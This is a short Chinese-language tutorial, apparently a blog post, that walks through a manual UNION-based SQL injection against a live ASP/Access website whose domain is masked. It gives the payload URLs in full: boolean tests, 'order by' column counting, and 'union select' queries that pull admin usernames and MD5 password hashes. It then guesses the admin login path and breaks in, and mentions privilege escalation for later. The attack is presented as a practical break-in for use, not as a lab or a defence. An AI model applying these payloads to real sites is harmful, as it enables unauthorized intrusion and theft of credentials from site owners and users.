【實戰】利用聯合查詢--手工SQL注入拿下網站

        看到不少腳本小子，工具黨用啊D，明小子，穿山甲對網站掃來掃去，拿個後臺什麼的，其實基礎是最重要的，今天我來講一下純手工注入一個站點。

 

目標網址:http://www.******.com/about.asp?id=1

 

1.首先確認這裏是否存在整型注入，很簡單，url後加' and 1=1 and 1=2,不細說。同時咱們還判斷出這是Access的數據庫。

 

2.利用order by判斷表項有幾個；

    http://www.******.com/about.asp?id=1 order by 4（這裏的5報錯，4正確，就是4個了）

 

3.而後測試顯示位，2，3位可顯；

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,2,3,4 from admin

 

4.在顯示位猜想字段值；這裏的表名，字段名根據經驗來試；常見的就那幾種；咱們獲得了用戶名和密碼（MD5加密的）；

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,username,3,4 from admin
    http://www.******.com/about.asp?id=1 and 1=2 union select 1,password,3,4 from admin

 

5.拿到用戶名密碼後，尋找後臺，常見的admin/login/manager/admin_login等能夠試一試，成功登錄，搞定。提權後面再說咯。